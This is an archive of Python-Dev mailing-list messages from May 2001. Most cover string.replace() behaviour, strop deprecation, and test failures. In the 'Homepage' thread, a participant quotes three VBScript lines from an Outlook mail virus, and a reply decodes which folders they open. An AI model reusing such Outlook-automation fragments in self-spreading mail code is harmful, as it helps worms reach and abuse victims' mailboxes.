part of the package.  TCL/TK is installed and I have been able to 
build TK GUI's.  How can I get Tkinter added to my Python package?  
Thanks.

Mike


From tim.one@home.com  Thu May 10 01:47:52 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 20:47:52 -0400
Subject: [Python-Dev] Inconsistent string.replace() behavior
Message-ID: <LNBBLJKPBEHFEDALKOLCGEDLKBAA.tim.one@home.com>

test_strop.py contains this line:

    test('replace', 'one!two!three!', 'one@two@three@', '!', '@', 0)

string_tests.py has this:

    test('replace', 'one!two!three!', 'one!two!three!', '!', '@', 0)

IOW, the test suite insists that

    strop.replace('one!two!three!', '!', '@', 0)

replace all matches but that

    string.replace('one!two!three!', '!', '@', 0)
and
    'one!two!three!'.replace('!', '@', 0)

replace nothing.

I've been thrashing like a madman trying to fix a common bug in both modules
(in out-of-synch copies of mymemreplace), and every time I think I fix
something "the other" module breaks.  The above appears to be why.

My opinion:  the test_strop.py test is in error, and so was strop_replace()
in stropmodule.c.  I'm checking in changes accordingly, but won't mind
getting yelled at if you disagree.
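The two conventions at issue can be compared in a few lines of present-day Python. This is a sketch, not the C code in stringobject.c or stropmodule.c: it leans on str.split(), whose maxsplit argument follows the same rule as str.replace()'s count (-1, the default, means "all"; 0 means "none"). `replace_sketch` and `strop_style_replace` are hypothetical names, and the second one only models the "zero means all" rule Guido describes for Python 1.5 and strop:

```python
def replace_sketch(s, old, new, count=-1):
    """Mimic str.replace(): count=-1 replaces every match, 0 replaces none.

    An empty `old` is not handled in this sketch.
    """
    if not old:
        raise ValueError("this sketch requires a non-empty 'old'")
    return new.join(s.split(old, count))


def strop_style_replace(s, old, new, count=0):
    """Hypothetical model of the old strop rule: a count of 0 means 'all'."""
    return replace_sketch(s, old, new, -1 if count == 0 else count)


print(replace_sketch('one!two!three!', '!', '@', 0))       # one!two!three!
print(strop_style_replace('one!two!three!', '!', '@', 0))  # one@two@three@
```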


From greg@cosc.canterbury.ac.nz  Thu May 10 01:56:12 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 10 May 2001 12:56:12 +1200 (NZST)
Subject: [Python-Dev] gcc barfs on recent stringobject changes...
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEADKBAA.tim.one@home.com>
Message-ID: <200105100056.MAA17516@s454.cosc.canterbury.ac.nz>

Tim Peters <tim.one@home.com>:

>		PyObject *t = (PyObject *)op;
>    		PyString_InternInPlace(&t);

If you want to keep it all on one line, you could try

	PyString_InternInPlace((PyObject **)&op);

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From guido@digicool.com  Thu May 10 03:00:36 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:00:36 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 19:46:13 -0400."
 <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com>
Message-ID: <200105100200.VAA00411@cj20424-a.reston1.va.home.com>

> Oh, fuck.  Somebody remind me why we have both stropmodule.c and
> stringobject.c?  These bugs exist in both.

In my mind, strop is obsolete.  We keep it around because some losers
like to import it directly, but it's basically dead, and except for a
few functions, string.py doesn't use it any more.  (The exceptions are
maketrans, lowercase, uppercase, whitespace.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Thu May 10 03:01:20 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:01:20 -0500
Subject: [Python-Dev] CygWin and Tkinter
In-Reply-To: Your message of "Thu, 10 May 2001 00:16:28 GMT."
 <9dcmks+6aqf@eGroups.com>
References: <9dcmks+6aqf@eGroups.com>
Message-ID: <200105100201.VAA00435@cj20424-a.reston1.va.home.com>

> I am playing around with CygWin (which came with Python 2.1
> installed).  While I can run command line programs, Tkinter is not 
> part of the package.  TCL/TK is installed and I have been able to 
> build TK GUI's.  How can I get Tkinter added to my Python package?  
> Thanks.

Beats me.  Ask whoever produces the CygWin port.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Thu May 10 02:07:40 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 21:07:40 -0400
Subject: [Python-Dev] gcc barfs on recent stringobject changes...
In-Reply-To: <200105100056.MAA17516@s454.cosc.canterbury.ac.nz>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEDNKBAA.tim.one@home.com>

>>		PyObject *t = (PyObject *)op;
>>   		PyString_InternInPlace(&t);

[Greg Ewing]
> If you want to keep it all on one line, you could try
>
> 	PyString_InternInPlace((PyObject **)&op);

op is declared "register" so it's not strictly legal to apply the address-of
operator to it regardless.  Besides, Guido pays me by the line <wink>.

or-maybe-by-the-useless-checkin-to-judge-from-the-last-24-hours-ly
    y'rs  - tim


From gward@python.net  Thu May 10 02:08:58 2001
From: gward@python.net (Greg Ward)
Date: Wed, 9 May 2001 21:08:58 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100200.VAA00411@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 09:00:36PM -0500
References: <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com> <200105100200.VAA00411@cj20424-a.reston1.va.home.com>
Message-ID: <20010509210858.A3467@gerg.ca>

On 09 May 2001, Guido van Rossum said:
> In my mind, strop is obsolete.  We keep it around because some losers
> like to import it directly, but it's basically dead, and except for a
> few functions, string.py doesn't use it any more.  (The exceptions are
> maketrans, lowercase, uppercase, whitespace.)

Perhaps 2.2 should deprecate direct use of strop noisily -- warn when
imported, except when imported by string.py.  (No idea how you'd
implement that, I'm just spouting off.)  Then it could go away in 2.3.

I don't think there's anything particularly controversial about 'strop'
going away after one release with a deprecation warning -- it's not
'string', after all!  (I.e., imported by every single scrap of Python code
ever written before string methods came along, and by quite a lot since
then.)
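Greg leaves the mechanism open. One possible shape, sketched in present-day Python, is a helper that decides whether to warn once the importing file is known. Working out who the importer is (for example from the call stack) is the fragile part and is assumed here, not shown; `warn_unless_imported_by` is a hypothetical name, not anything in the Python source:

```python
import os
import warnings


def warn_unless_imported_by(module_name, importer_file, allowed=("string.py",)):
    """Warn about a direct import of `module_name` unless the importing
    file's basename is in `allowed`. Returns True if a warning was issued."""
    if importer_file and os.path.basename(importer_file) in allowed:
        return False  # e.g. string.py itself: stay quiet
    warnings.warn("the %s module is deprecated" % module_name,
                  DeprecationWarning, stacklevel=2)
    return True
```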

        Greg
-- 
Greg Ward - nerd                                        gward@python.net
http://starship.python.net/~gward/
I joined scientology at a garage sale!!


From guido@digicool.com  Thu May 10 03:12:55 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:12:55 -0500
Subject: [Python-Dev] Inconsistent string.replace() behavior
In-Reply-To: Your message of "Wed, 09 May 2001 20:47:52 -0400."
 <LNBBLJKPBEHFEDALKOLCGEDLKBAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCGEDLKBAA.tim.one@home.com>
Message-ID: <200105100212.VAA00491@cj20424-a.reston1.va.home.com>

> test_strop.py contains this line:
> 
>     test('replace', 'one!two!three!', 'one@two@three@', '!', '@', 0)
> 
> string_tests.py has this:
> 
>     test('replace', 'one!two!three!', 'one!two!three!', '!', '@', 0)
> 
> IOW, the test suite insists that
> 
>     strop.replace('one!two!three!', '!', '@', 0)
> 
> replace all matches but that
> 
>     string.replace('one!two!three!', '!', '@', 0)
> and
>     'one!two!three!'.replace('!', '@', 0)
> 
> replace nothing.
> 
> I've been thrashing like a madman trying to fix a common bug in both modules
> (in out-of-synch copies of mymemreplace), and every time I think I fix
> something "the other" module breaks.  The above appears to be why.
> 
> My opinion:  the test_strop.py test is in error, and so was strop_replace()
> in stropmodule.c.  I'm checking in changes accordingly, but won't mind
> getting yelled at if you disagree.

HMMMMMM!  In Python 1.5, a count of zero always replaces all
occurrences, both using string and using strop.  In 2.0 and later,
strop's replace(..., 0) still replaces all, but string's replaces
none.  The replace() method of strings and unicode objects agrees with
string.py.

I think this change was made for the sake of ease of documenting the
behavior: special-casing the count of zero is unexpected.

I very vaguely recall that it was discussed on this list.

So this suggests that test_string is correct, and string.replace()
(and the methods) shouldn't be "fixed"!

But since we're not really supporting strop any more, I think that
strop shouldn't be changed either.  So we'll have to live with the
difference -- sorry!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Thu May 10 02:13:20 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 21:13:20 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100200.VAA00411@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEDOKBAA.tim.one@home.com>

[Guido]
> In my mind, strop is obsolete.  We keep it around because some losers
> like to import it directly, but it's basically dead, and except for a
> few functions, string.py doesn't use it any more.  (The exceptions are
> maketrans, lowercase, uppercase, whitespace.)

So if Fred changes the docs to say it's obsolete, maybe we can actually rip
out the buggy and redundant code it contains in about 2 years <wink>.

cheeredly y'rs  - tim


From guido@digicool.com  Thu May 10 03:25:43 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:25:43 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 21:08:58 -0400."
 <20010509210858.A3467@gerg.ca>
References: <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com> <200105100200.VAA00411@cj20424-a.reston1.va.home.com>
 <20010509210858.A3467@gerg.ca>
Message-ID: <200105100225.VAA00592@cj20424-a.reston1.va.home.com>

> Perhaps 2.2 should deprecate direct use of strop noisily -- warn when
> imported, except when imported by string.py.  (No idea how you'd
> implement that, I'm just spouting off.)  Then it could go away in 2.3.

I have had the necessary mods sitting in my directory for months (it
was one of my first tests for using the warnings module), but decided
against checking it in because I found there's quite a bit of code
that triggered the warnings.  Maybe I should check it in into 2.2a0,
so developers can get used to it.

> I don't think there's anything particularly controversial about 'strop'
> going away after one release with a deprecation warning -- it's not
> 'string', after all!  (Ie. imported by every single scrap of Python code
> ever written before string methods came along, and by quite a lot since
> then.)

Agreed.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Thu May 10 03:27:23 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:27:23 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 21:13:20 -0400."
 <LNBBLJKPBEHFEDALKOLCGEDOKBAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCGEDOKBAA.tim.one@home.com>
Message-ID: <200105100227.VAA00607@cj20424-a.reston1.va.home.com>

> [Guido]
> > In my mind, strop is obsolete.  We keep it around because some losers
> > like to import it directly, but it's basically dead, and except for a
> > few functions, string.py doesn't use it any more.  (The exceptions are
> > maketrans, lowercase, uppercase, whitespace.)
> 
> So if Fred changes the docs to say it's obsolete, maybe we can actually rip
> out the buggy and redundant code it contains in about 2 years <wink>.

Yes, but in the mean time the fact that it's buggy doesn't bother me
at all.  Let it be as buggy as it always was -- that's one more reason
to stop using it! :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Thu May 10 02:33:52 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 21:33:52 -0400
Subject: [Python-Dev] Inconsistent string.replace() behavior
In-Reply-To: <200105100212.VAA00491@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEDPKBAA.tim.one@home.com>

[Guido]
> HMMMMMM!  In Python 1.5, a count of zero always replaces all
> occurrences, both using string and using strop.  In 2.0 and later,
> strop's replace(..., 0) still replaces all, but string's replaces
> none.  The replace() method of strings and unicode objects agrees with
> string.py.
>
> I think this change was made for the sake of ease of documenting the
> behavior: special-casing the count of zero is unexpected.

Yes, -1 == infinity is much clearer <wink>.

> I very vaguely recall that it was discussed on this list.
>
> So this suggests that test_string is correct, and string.replace()
> (and the methods) shouldn't be "fixed"!

I didn't change their behavior wrt replace()'s interpretation of count, but
to repair an unrelated bug (bogus MemoryError for an empty-string *result*)
that happened to appear in both copies of mymemreplace sitting in the code
base (one in stringobject.c, another but out-of-synch one in stropmodule.c).
That's how stropmodule got sucked into this:  to fix the gross null-string
result bug common to both.

> But since we're not really supporting strop any more, I think that
> strop shouldn't be changed either.  So we'll have to live with the
> difference -- sorry!

OK, I've restored the 0 == infinity semantics to strop.replace() and
test_strop.py, but have not backed out the null-string result fix, nor the
pain to make the mymemreplace clones identical again.
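For reference, here is how str.replace() treats its count argument in a modern Python 3 interpreter. This is an assumption about today's behavior, not 2.1, whose strop.replace() still treats 0 as "replace all". A count of 0 replaces nothing, any negative count replaces every match, and an empty *result* comes back as an ordinary value rather than a MemoryError.

```python
s = "one!two!three!"

# Count semantics of str.replace() (Python 3; matches string.py in 2.1).
replace_none = s.replace("!", "@", 0)     # 0 means "replace nothing"
replace_first = s.replace("!", "@", 1)    # replace only the first match
replace_all = s.replace("!", "@", -1)     # any negative count means "replace all"
replace_default = s.replace("!", "@")     # omitting count also replaces all

# An empty result is a normal return value, not an error condition.
empty_result = "!!!".replace("!", "")

for label, value in [("0", replace_none), ("1", replace_first),
                     ("-1", replace_all), ("default", replace_default),
                     ("empty", empty_result)]:
    print(f"{label:>8}: {value!r}")
```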


From tim.one@home.com  Thu May 10 03:00:30 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 22:00:30 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100227.VAA00607@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEEBKBAA.tim.one@home.com>

[Guido]
> Yes, but in the mean time the fact that it's buggy doesn't bother me
> at all.  Let it be as buggy as it always was -- that's one more reason
> to stop using it! :-)

I think that's unsustainable in this specific case:  stringobject and
stropmodule contained several utility functions with the same names that
clearly started life as identical code.  Over time they got out of synch, and
when they punched me in the face today, I had no idea which was "right" and
which "wrong".  Turned out they both had the same bug, and the clearest way
to fix it in stringobject.c without leaving a more inconsistent x-module mess
was to bring the once-common utility routines back into synch.

As /F said, though, the mymemreplace() approach is inefficient and "should
be" replaced wholesale.  If that's done in stringobject.c alone, great, then
I won't care about the legacy routines in stropmodule.c either.  What I can't
abide is having one copy of a function in the codebase work and a clone of it
not work -- unless you can keep the undocumented history of both in your mind
at all times, you're just as likely to bump into the broken one first when
searching the code base, and if you're unlucky never even realize it is "the
broken one" (or, if you're lucky, bump into the good one too, and then pee
away time trying to understand the differences).

i-have-garbage-in-my-kitchen-too-but-i-put-it-in-a-bag-so-i-don't-
    eat-it-by-mistake<wink>-ly y'rs  - tim


From Jason.Tishler@dothill.com  Thu May 10 03:06:15 2001
From: Jason.Tishler@dothill.com (Jason Tishler)
Date: Wed, 9 May 2001 22:06:15 -0400
Subject: [Python-Dev] CygWin and Tkinter
In-Reply-To: <200105100201.VAA00435@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 09:01:20PM -0500
References: <9dcmks+6aqf@eGroups.com> <200105100201.VAA00435@cj20424-a.reston1.va.home.com>
Message-ID: <20010509220615.A1928@dothill.com>

Mike,

On Wed, May 09, 2001 at 09:01:20PM -0500, Guido van Rossum wrote:
> > I am playing around with CygWin (which came with Python 2.1 
> > installed).  While I can run command line programs, Tkinter is not 
> > part of the package.  TCL/TK is installed and I have been able to 
> > build TK GUI's.  How can I get Tkinter added to my Python package?  
> > Thanks.
> 
> Beats me.  Ask whoever produces the CygWin port.

I am the Cygwin Python maintainer.  Please see the following for my
views on adding Tkinter support to Cygwin Python:

    http://sources.redhat.com/ml/cygwin/2001-04/msg01842.html

If Tkinter support is important to you, then please submit the appropriate
patches for consideration to the Python Patch Manager on SourceForge.

Norman Vine has built a Cygwin Python that supports Tkinter.  See the
following for his build procedure:

    http://www.vso.cape.com/~nhv/files/python/

Perhaps you would like to collaborate with Norman on this effort?

Thanks,
Jason

-- 
Jason Tishler
Director, Software Engineering       Phone: +1 (732) 264-8770 x235
Dot Hill Systems Corp.               Fax:   +1 (732) 264-8798
82 Bethany Road, Suite 7             Email: Jason.Tishler@dothill.com
Hazlet, NJ 07730 USA                 WWW:   http://www.dothill.com


From tim.one@home.com  Thu May 10 03:54:45 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 22:54:45 -0400
Subject: [Python-Dev] test_mmap failing?
Message-ID: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>

I checked in a change to mmapmodule.c earlier today, to close a patch
complaining about unused vrbl warnings.

Here's the changed routine before ("value" is unused):

mmap_read_byte_method(mmap_object *self,
                      PyObject *args)
{
        char value;
        char *where;
        CHECK_VALID(NULL);
        if (!PyArg_ParseTuple(args, ":read_byte"))
                return NULL;
        if (self->pos < self->size) {
                where = self->data + self->pos;
                value = (char) *(where);
                self->pos += 1;
                return Py_BuildValue("c", (char) *(where));
        } else {
                PyErr_SetString (PyExc_ValueError, "read byte out of range");
                return NULL;
        }
}

and after:

mmap_read_byte_method(mmap_object *self,
                      PyObject *args)
{
        CHECK_VALID(NULL);
        if (!PyArg_ParseTuple(args, ":read_byte"))
                return NULL;
        if (self->pos < self->size) {
                char value = self->data[self->pos];
                self->pos += 1;
                return Py_BuildValue("c", value);
        } else {
                PyErr_SetString (PyExc_ValueError, "read byte out of range");
                return NULL;
        }
}
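The contract both versions implement (return the byte at pos and advance, or raise ValueError once pos reaches size) can be exercised from Python. A minimal sketch, assuming Python 3, where mmap.read_byte() returns an int rather than a one-character string; the helper name read_bytes_until_error is hypothetical. Mapping a zero-length file fails, so the data must be non-empty.

```python
import mmap
import tempfile


def read_bytes_until_error(data):
    """Map `data` read-only and call read_byte() until it raises ValueError."""
    values = []
    with tempfile.TemporaryFile() as f:
        f.write(data)
        f.flush()
        with mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ) as m:
            while True:
                try:
                    values.append(m.read_byte())  # int in Python 3
                except ValueError as exc:         # pos has reached size
                    return values, str(exc)


print(read_bytes_until_error(b"ab"))
```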

I'll be damned if I can see any semantic difference, and test_mmap worked
fine on Windows after the change.  But Fred reported:

"""
the fix introduced breakage on Linux (kernel 2.2.17):

cj42289-a(.../python/linux-beowolf); ./python ../Lib/test/regrtest.py -v test_mmap
test_mmap
test_mmap
test test_mmap crashed -- exceptions.IOError: [Errno 22] Invalid argument
Traceback (most recent call last):
  File "../Lib/test/regrtest.py", line 246, in runtest
    __import__(test, globals(), locals(), [])
  File "../Lib/test/test_mmap.py", line 124, in ?
    test_both()
  File "../Lib/test/test_mmap.py", line 14, in test_both
    f.write('\0'* PAGESIZE)
IOError: [Errno 22] Invalid argument
1 test failed: test_mmap
"""

However, at the point that's failing, test_mmap hasn't even *created* an
mmap'ed file yet, let alone tried to read from it.  The only thing test_mmap
did so far is (the first comment is bogus -- that's the builtin Python open()
function):

    # Create an mmap'ed file   # THIS IS A BOGUS COMMENT
    f = open('foo', 'w+')

    # Write 2 pages worth of data to the file
    f.write('\0'* PAGESIZE)    # THIS IS THE LINE IT'S DYING ON

But having suffered too many "impossible problems" the last 36 hours, my
confidence is shot <0.93 wink>.  Is test_mmap failing for anyone else under
current CVS?  Fred, are you *sure* it fails for you -- if so, does the
problem actually go away if you revert mmapmodule.c?

looking-for-sense-in-all-the-wrong-places-ly y'rs  - tim


From jeremy@digicool.com  Thu May 10 04:17:34 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Wed, 9 May 2001 23:17:34 -0400 (EDT)
Subject: [Python-Dev] test_mmap failing?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
Message-ID: <15098.2126.368714.159135@slothrop.digicool.com>

The latest CVS build works on my Linux 2.2.12 system.  No problem with
test_mmap.  But test_pty does fail with some complaints about FCNTL,
which Fred just removed.  Maybe Fred is working in an alternate
universe where test_mmap and test_pty are swapped.

Jeremy


From barry@digicool.com  Thu May 10 05:08:42 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Thu, 10 May 2001 00:08:42 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
References: <LNBBLJKPBEHFEDALKOLCGEDHKBAA.tim@digicool.com>
 <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com>
Message-ID: <15098.5194.677531.35326@anthem.wooz.org>

>>>>> "TP" == Tim Peters <tim.one@home.com> writes:

    TP> Oh, fuck.  Somebody remind me why we have both stropmodule.c
    TP> and stringobject.c?  These bugs exist in both.

IIRC, I once proposed to share code bases through elaborate
#includes and exported functions, but that never went very far.
Guido's already pronounced on this, and I'd say good riddance to
strop.

>>>>> "GvR" == Guido van Rossum <guido@digicool.com> writes:

    GvR> Yes, but in the mean time the fact that it's buggy doesn't
    GvR> bother me at all.  Let it be as buggy as it always was --
    GvR> that's one more reason to stop using it! :-)
-----------------------------------^^^^

For a minute there, I thought you said "to strop using it". :)

-Barry


From fredrik@pythonware.com  Thu May 10 07:22:53 2001
From: fredrik@pythonware.com (Fredrik Lundh)
Date: Thu, 10 May 2001 08:22:53 +0200
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
References: <LNBBLJKPBEHFEDALKOLCKEEBKBAA.tim.one@home.com>
Message-ID: <004001c0d919$a62de7d0$e46940d5@hagrid>

Tim Peters wrote:
> I think that's unsustainable in this specific case:  stringobject and
> stropmodule contained several utility functions with the same names that
> clearly started life as identical code.  Over time they got out of synch, and
> when they punched me in the face today, I had no idea which was "right" and
> which "wrong".  Turned out they both had the same bug, and the clearest way
> to fix it in stringobject.c without leaving a more inconsistent x-module mess
> was to bring the once-common utility routines back into synch.
> 
> As /F said, though, the mymemreplace() approach is inefficient and "should
> be" replaced wholesale.  If that's done in stringobject.c alone, great, then
> I won't care about the legacy routines in stropmodule.c either.

as a footnote, SRE uses the same source code to generate
both 8-bit and 16-bit versions of the match engine.  I see no
reason why we cannot do the same for the string operations
(PyString, PyUnicode, and strop).

if anyone wants me to look into this, just say "go ahead".  

> > no wonder u"".replace() is 30% faster than "".replace() ;-)
> 
> For a given number of characters or bytes <wink>?

characters.  judging from the SRE benchmarks, modern platforms
can process 16-bit characters as fast as they can process 8-bit
characters.

Cheers /F


From thomas@xs4all.net  Thu May 10 10:31:38 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Thu, 10 May 2001 11:31:38 +0200
Subject: [Python-Dev] Homepage
In-Reply-To: <200105091712.TAA05172@core.inf.ethz.ch>; from pedroni@inf.ethz.ch on Wed, May 09, 2001 at 07:12:20PM +0200
References: <200105091712.TAA05172@core.inf.ethz.ch>
Message-ID: <20010510113138.K16486@xs4all.nl>

On Wed, May 09, 2001 at 07:12:20PM +0200, Samuele Pedroni wrote:

> Set s=CreateObject("Outlook.Application")
> Set t=s.GetNameSpace("MAPI")
> Set u=t.GetDefaultFolder(6)

[..]

> Set u=t.GetDefaultFolder(3)

I know it's off-topic, but Greg started it! ;-) Does anyone know which
folders those two 'GetDefaultFolder' statements open ? I suspect it's
sent-mail and trash, or some such, but I don't know enough about Outlook to
know if it even *has* sent-mail and trash folders :)

Thanx for sending it through, Samuele, it was fun reading, and useful to our
helpdesk (especially the fact that it only sends out mails once, even though
it starts the porn page every time, and that it doesn't do anything harmful
at all.)

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From MarkH@ActiveState.com  Thu May 10 11:36:13 2001
From: MarkH@ActiveState.com (Mark Hammond)
Date: Thu, 10 May 2001 20:36:13 +1000
Subject: [Python-Dev] Homepage
In-Reply-To: <20010510113138.K16486@xs4all.nl>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIEEPDMAA.MarkH@ActiveState.com>

> > Set u=t.GetDefaultFolder(6)
> > Set u=t.GetDefaultFolder(3)

> I know it's off-topic, but Greg started it! ;-) Does anyone know which
> folders those two 'GetDefaultFolder' statements open ? I suspect it's
> sent-mail and trash, or some such, but I don't know enough about Outlook to
> know if it even *has* sent-mail and trash folders :)

Running makepy.py over the Outlook type library yields the following:

	olFolderCalendar              =0x9        # from enum OlDefaultFolders
	olFolderContacts              =0xa        # from enum OlDefaultFolders
	olFolderDeletedItems          =0x3        # from enum OlDefaultFolders
	olFolderDrafts                =0x10       # from enum OlDefaultFolders
	olFolderInbox                 =0x6        # from enum OlDefaultFolders
	olFolderJournal               =0xb        # from enum OlDefaultFolders
	olFolderNotes                 =0xc        # from enum OlDefaultFolders
	olFolderOutbox                =0x4        # from enum OlDefaultFolders
	olFolderSentMail              =0x5        # from enum OlDefaultFolders
	olFolderTasks                 =0xd        # from enum OlDefaultFolders

So it appears the inbox and deleted items.
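To decode such GetDefaultFolder() arguments programmatically, the enum values above can be loaded into a lookup table. A small sketch using Python's enum.IntEnum; the class simply mirrors the makepy output and is not the generated pywin32 module itself.

```python
from enum import IntEnum


class OlDefaultFolders(IntEnum):
    # Values copied from the makepy output for enum OlDefaultFolders.
    olFolderDeletedItems = 0x3
    olFolderOutbox = 0x4
    olFolderSentMail = 0x5
    olFolderInbox = 0x6
    olFolderCalendar = 0x9
    olFolderContacts = 0xa
    olFolderJournal = 0xb
    olFolderNotes = 0xc
    olFolderTasks = 0xd
    olFolderDrafts = 0x10


# The two codes used in the script.
for code in (6, 3):
    print(code, OlDefaultFolders(code).name)
```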

Mark.


From tim.one@home.com  Thu May 10 09:54:42 2001
From: tim.one@home.com (Tim Peters)
Date: Thu, 10 May 2001 04:54:42 -0400
Subject: [Python-Dev] test___all__ failing on WIndows
Message-ID: <LNBBLJKPBEHFEDALKOLCKEFAKBAA.tim.one@home.com>

> python  ../lib/test/regrtest.py test___all__

test___all__
test test___all__ failed -- tty has no __all__ attribute
1 test failed: test___all__

C:\Code\python\dist\src\PCbuild>

I assume this is yet another case where some excruciatingly non-obvious
sequence of failing imports manages to leave behind a damaged module object
in sys.modules that prevents test___all__'s import of tty from getting the
ImportError it *ought* to get under Windows (and betting termios is the
ultimate culprit).

I've fixed enough of these.  Somebody who thinks this is "a feature" gets to
do it this time <wink/snarl>.


From guido@digicool.com  Thu May 10 14:43:07 2001
From: guido@digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 08:43:07 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 22:00:30 -0400."
 <LNBBLJKPBEHFEDALKOLCKEEBKBAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCKEEBKBAA.tim.one@home.com>
Message-ID: <200105101343.IAA01450@cj20424-a.reston1.va.home.com>

> [Guido]
> > Yes, but in the mean time the fact that it's buggy doesn't bother
> > me at all.  Let it be as buggy as it always was -- that's one more
> > reason to stop using it! :-)

[Tim]
> I think that's unsustainable in this specific case: stringobject and
> stropmodule contained several utility functions with the same names
> that clearly started life as identical code.  Over time they got out
> of synch, and when they punched me in the face today, I had no idea
> which was "right" and which "wrong".  Turned out they both had the
> same bug, and the clearest way to fix it in stringobject.c without
> leaving a more inconsistent x-module mess was to bring the
> once-common utility routines back into synch.

Of course, the real bug was copy-and-paste programming.  The common
code should have been factored out rather than copied.

> As /F said, though, the mymemreplace() approach is inefficient and
> "should be" replaced wholesale.  If that's done in stringobject.c
> alone, great, then I won't care about the legacy routines in
> stropmodule.c either.  What I can't abide is having one copy of a
> function in the codebase work and a clone of it not work -- unless
> you can keep the undocumented history of both in your mind at all
> times, you're just as likely to bump into the broken one first when
> searching the code base, and if you're unlucky never even realize it
> is "the broken one" (or, if you're lucky, bump into the good one
> too, and then pee away time trying to understand the differences).

Here's an idea.  We remove stropmodule.c, and replace it with a
strop.py that issues a warning and then imports selected things from
string.py.

The only complication is that there are a few constants and one
function in strop that are still imported into string.py; I propose to
move these to an "internal" extension module (e.g. "_string").

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Thu May 10 15:02:59 2001
From: guido@digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 09:02:59 -0500
Subject: [Python-Dev] test_mmap failing?
In-Reply-To: Your message of "Wed, 09 May 2001 23:17:34 -0400."
 <15098.2126.368714.159135@slothrop.digicool.com>
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
 <15098.2126.368714.159135@slothrop.digicool.com>
Message-ID: <200105101402.JAA01678@cj20424-a.reston1.va.home.com>

> The latest CVS build works on my Linux 2.2.12 system.  No problem with
> test_mmap.  But test_pty does fail with some complaints about FCNTL,
> which Fred just removed.  Maybe Fred is working in an alternate
> universe where test_mmap and test_pty are swapped.

Strange.  They *both* work for me with the latest CVS (and even after
removing all *.pyc files!), although last night (?) I recall seeing a
test_pty failure too.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com (Skip Montanaro)  Thu May 10 15:16:24 2001
